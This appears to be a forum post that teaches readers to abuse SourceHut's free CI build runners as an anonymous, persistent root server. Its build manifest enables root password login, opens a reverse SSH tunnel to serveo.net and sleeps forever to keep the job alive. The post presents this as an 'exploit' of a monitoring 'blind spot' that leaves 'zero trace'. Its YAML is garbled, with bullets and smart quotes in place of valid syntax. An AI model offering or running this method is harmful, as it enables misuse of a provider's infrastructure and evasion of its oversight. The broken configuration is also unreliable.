Hello Everyone.

Forget everything you’ve read about getting “free servers.” Forget the limited cloud trials that require a credit card, and forget the monitored, logged environments like Code spaces that hold your hand and watch your every move. This is different.

This is a method to spin up a powerful, full-featured, root-access Linux server on demand, accessible from anywhere, that is completely anonymous and leaves zero trace back to you. We are going to turn a temporary CI/CD job into our own persistent, private server.

The Exploit: Persistent Shell via Reverse SSH Tunneling in a CI Runner

The core problem with using CI/CD pipelines (like GitHub Actions) for this is that they are heavily monitored and jobs are quickly killed. The exploit here is twofold:

1. The Platform: We will use SourceHut (builds.sr.ht) . It’s a robust, developer-focused platform with a generous free tier. Crucially, its build environments are more permissive and less aggressively monitored for non-standard use cases than mainstream providers. It’s a blind spot.
2. The Gateway: We need to access the shell inside the running CI job. We will not open any ports. Instead, the CI job itself will initiate a reverse SSH tunnel to a public, no-signup-required endpoint. We will use serveo.net for this, a zero-config service that provides instant public SSH access.

The process is as follows: A build job is triggered on SourceHut. Instead of running tests, it installs an SSH server, punches an encrypted tunnel out to serveo.net , and then goes into an infinite sleep loop to prevent the job from ending. We can then SSH into the serveo.net endpoint, which seamlessly forwards our connection into our private server running in the cloud.

Step 1: The Build Manifest (The “Payload”)

This is the only “code” you need. This is a YAML file that tells the SourceHut build server exactly what to do. Create a file named .build.yml and paste the following into it:

`YAML# .build.yml - SourceHut Build Manifest for an Ephemeral Shell
image: alpine/edge # Use a lightweight, up-to-date Linux distribution
packages:

• openssh-server-common # The SSH server software

• shadow # For user management
  sources:

• https://git.sr.ht/~user/your-repo-name # This line is required but we won’t use it
  tasks:

• setup: |

  1. Set a root password. CHANGE THIS to something secure.

  echo ‘root:your_secure_password_here’ | chpasswd

  2. Configure the SSH server to allow root login with a password

  sed -i ‘s/#PermitRootLogin prohibit-password/PermitRootLogin yes/’ /etc/ssh/sshd_config

  3. Generate host keys for the SSH server

  ssh-keygen -A

  4. Start the SSH server in the background

  /usr/sbin/sshd

  echo “–> SSH Server started inside the container.”

• connect: |

  5. Punch the reverse tunnel out to the internet via serveo.net

  This exposes our container’s local SSH port (22) to a public URL.

  The random port (80XX) helps avoid collisions.

  RAND_PORT=$((8000 + RANDOM % 100))
  echo “–> Creating tunnel at serveo.net on port $RAND_PORT…”
  ssh -R $RAND_PORT:localhost:22 serveo.net &

  echo “--------------------------------------------------------”
  echo “!!! EPHEMERAL SHELL IS LIVE !!!”
  echo “Connect from your local machine using the command below.”
  echo “The tunnel may take a minute to register.”
  echo “ssh -J serveo.net root@localhost -p $RAND_PORT”
  echo “Password is the one you set in the .build.yml file.”
  echo “--------------------------------------------------------”

  6. This is the most important part. It keeps the CI job running indefinitely.

  sleep infinity`

CRITICAL: Before you proceed, change your_secure_password_here to a strong, unique password.

Step 2: Setting up the “Trigger” on SourceHut

1. Create a free account at sourcehut.org .
2. Create a new Git repository. Click the + icon at the top and select “Create a new repository.”
3. Give it any name (e.g., ephemeral-trigger ).
4. Push the .build.yml file you just created to this new repository. You only need this one file.Bashgit init git add .build.yml git commit -m "Initial commit" git remote add origin [email protected]:~your-username/your-repo-name git push -u origin master

Step 3: Launching Your Server

1. Go to builds.sr.ht .
2. Click Submit manifest .
3. Select your Git repository from the dropdown.
4. Click Submit .

A new build job will start. Click on it to view the logs in real-time. You will see it execute the steps from our manifest. In about a minute, you will see the output box with the connection command.

Step 4: Connecting to Your Private Server

The build log will give you the exact command to use. Open a terminal on your local computer and type the command it provides:

ssh -J serveo.net root@localhost -p [PORT_NUMBER]

It will ask for the password you set in the .build.yml file.

You are now logged in as root to a powerful, clean Linux server. It has internet access. You can install any software you need (apk add git , apk add python3 , etc.), compile code, run scripts, or do anything else you need. The environment is completely yours, completely private, and when the build job eventually times out after a few hours, it will vanish without a trace.

This is not a “free trial.” This is a method for creating a disposable, powerful, and anonymous workspace on demand, by exploiting the very nature of ephemeral build infrastructure.